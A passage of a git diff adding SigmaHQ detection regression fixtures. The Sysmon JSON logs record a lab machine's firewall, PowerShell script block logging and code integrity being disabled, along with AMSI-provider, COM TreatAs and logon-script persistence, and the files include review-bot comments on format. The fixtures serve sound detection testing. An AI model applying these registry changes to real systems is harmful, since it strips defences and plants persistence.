{ + "SystemTime": "2025-10-26T18:12:38.491176Z" + } + }, + "EventRecordID": 28344632, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": 
"ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:12:38.476", + "ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002", + "ProcessId": 7460, + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\http", + "Details": "DWORD (0x00000002)", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:12:38.500426Z" + } + }, + "EventRecordID": 28344633, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:12:38.492", + "ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002", + "ProcessId": 7460, + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\*", + "Details": "DWORD (0x00000002)", + "User": "ATTACKRANGE\\Administrator" + } + } +} 
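Review bot: This file holds three pretty-printed JSON objects back to back, so it is not a single JSON document and a plain `json.load` would reject it; the AutoShare fixture in the hunk at L194–L195 has the same two-object layout. If these .json files are only a human-readable rendering of the neighbouring .evtx (the workflow passes an evtx checker, which suggests that), a short note in the fixture's info.yml saying so, or a `.jsonl` suffix with one object per line, would make that explicit. If a tool does parse them, confirm it accepts concatenated objects rather than a single top-level value.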
diff --git a/regression_data/windows/registry/registry_set/registry_set_change_security_zones/info.yml b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/info.yml new file mode 100644 index 000000000..c2c2b949d --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/info.yml @@ -0,0 +1,13 @@ +id: a118df85-dbf8-48d6-a3a6-f6ddebf975b6 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 45e112d0-7759-4c2a-aa36-9f8fb79d3393 + title: IE Change Domain Zone +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx new file mode 100644 index 000000000..1ce10fa0b Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json new file mode 100644 index 000000000..4647bf116 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json 
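Review bot: `match_count: 1` does not line up with the companion .json, which shows three separate SetValue events under the same `ZoneMap\Domains\bad-domain.com\bad-subdomain` key (`https`, `http` and `*`); a rule keyed on that path would presumably fire for each of them. If `match_count` is the exact number of expected matches the test would fail, and if it is a minimum the field name is misleading; the AutoShare fixture in the hunk at L195 has the same mismatch with two events (`AutoShareServer`, `AutoShareWks`). After confirming how the runner compares the value, either set `match_count: 3` here (and `2` for AutoShare) or note in the description that only one hit is expected and why.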
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:22:33.661127Z" + } + }, + "EventRecordID": 28528165, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:22:33.654", + "ProcessGuid": "5AA13A44-66E9-68FE-AC56-000000004002", + "ProcessId": 7108, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled", + "Details": "DWORD (0x00000000)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml new file mode 100644 index 000000000..b67697e10 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml 
@@ -0,0 +1,13 @@ +id: b60c9c4c-27e7-4870-af1d-f35582a44c07 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a + title: Hypervisor Enforced Code Integrity Disabled +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx new file mode 100644 index 000000000..72a44cd77 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json new file mode 100644 index 000000000..37412a2b7 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json 
@@ -0,0 +1,104 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:29:32.286061Z" + } + }, + "EventRecordID": 28656599, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:29:32.271", + "ProcessGuid": "5AA13A44-688C-68FE-D556-000000004002", + "ProcessId": 2712, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\AutoShareServer", + "Details": "DWORD (0x00000000)", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:29:32.296086Z" + } + }, + "EventRecordID": 28656618, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + 
"EventType": "SetValue", + "UtcTime": "2025-10-26 18:29:32.287", + "ProcessGuid": "5AA13A44-688C-68FE-D656-000000004002", + "ProcessId": 368, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\AutoShareWks", + "Details": "DWORD (0x00000000)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml new file mode 100644 index 000000000..25e592504 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml @@ -0,0 +1,13 @@ +id: c99b67cd-0a57-4023-9f88-35806d622b48 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e + title: Disable Administrative Share Creation at Startup +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx new file mode 100644 index 000000000..b0ba1d71f Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx differ 
diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json new file mode 100644 index 000000000..5e875acc2 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:36:31.269411Z" + } + }, + "EventRecordID": 28785637, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:36:31.258", + "ProcessGuid": "5AA13A44-6A2F-68FE-0857-000000004002", + "ProcessId": 9720, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\\EnableFirewall", + "Details": "DWORD (0x00000000)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml new file mode 100644 index 000000000..7a92d4f5f --- /dev/null 
+++ b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml @@ -0,0 +1,13 @@ +id: aa89a142-e72f-4b37-acd2-274ed81a1477 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 974515da-6cc5-4c95-ae65-f97f9150ec7f + title: Disable Microsoft Defender Firewall via Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx new file mode 100644 index 000000000..4b5fc4bf9 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json new file mode 100644 index 000000000..454733fba --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json 
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:42:48.447971Z" + } + }, + "EventRecordID": 28901143, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:42:48.434", + "ProcessGuid": "5AA13A44-6BA8-68FE-2F57-000000004002", + "ProcessId": 7476, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience", + "Details": "DWORD (0x00000000)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml new file mode 100644 index 000000000..77bf034fb --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml 
@@ -0,0 +1,13 @@ +id: b5d83cd8-e1e5-459e-9f06-7c1e41a9bfeb +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6 + title: Disable Windows Security Center Notifications +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx new file mode 100644 index 000000000..7e2621d0d Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json new file mode 100644 index 000000000..af2346ce4 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json 
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T23:49:35.941239Z" + } + }, + "EventRecordID": 16380977, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-25 23:49:35.941", + "ProcessGuid": "5AA13A44-620F-68FD-9A3E-000000004002", + "ProcessId": 9952, + "Image": "C:\\Windows\\system32\\regsvr32.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{00000000-DEAD-DEAD-DEAD-B2B2E0859059}\\(Default)", + "Details": "FakeAmsi", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml new file mode 100644 index 000000000..07e597d64 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml 
@@ -0,0 +1,13 @@ +id: 825fc38f-ff54-4338-8016-6f3477c7aa8f +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 + title: Potential Persistence Via New AMSI Providers - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx new file mode 100644 index 000000000..ddd48cf12 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json new file mode 100644 index 000000000..c1650198e --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json 
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T23:53:11.117530Z" + } + }, + "EventRecordID": 16447792, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-25 23:53:11.114", + "ProcessGuid": "5AA13A44-62E7-68FD-C13E-000000004002", + "ProcessId": 8536, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\\(Default)", + "Details": "{00000001-0000-0000-0000-0000FEEDACDC}", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml new file mode 100644 index 000000000..9994954f5 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml 
@@ -0,0 +1,13 @@ +id: 482ef6c8-3c2a-4b7b-a82e-b09f27576b96 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 9b0f8a61-91b2-464f-aceb-0527e0a45020 + title: Potential COM Object Hijacking Via TreatAs Subkey - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx new file mode 100644 index 000000000..f1fa9b2aa Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json new file mode 100644 index 000000000..22263d8c4 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json 
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T23:56:33.715505Z" + } + }, + "EventRecordID": 16510574, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-25 23:56:33.705", + "ProcessGuid": "5AA13A44-63B1-68FD-D93E-000000004002", + "ProcessId": 9452, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Environment\\UserInitMprLogonScript", + "Details": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\art.bat", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml new file mode 100644 index 000000000..330bb7320 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml 
@@ -0,0 +1,13 @@ +id: 84c6a082-3aa5-4387-b113-60415aeb9458 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 9ace0707-b560-49b8-b6ca-5148b42f39fb + title: Potential Persistence Via Logon Scripts - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx new file mode 100644 index 000000000..86a968f1f Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json new file mode 100644 index 000000000..2a2f08369 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json 
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-31T05:57:54.388692Z" + } + }, + "EventRecordID": 657715, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3080, + "ThreadID": 4948 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-31 05:57:54.387", + "ProcessGuid": "14207D89-4FE2-6904-D207-000000004002", + "ProcessId": 5612, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-1938467512-983293709-721003795-1103\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging", + "Details": "DWORD (0x00000000)", + "User": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml new file mode 100644 index 000000000..a9a631901 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml 
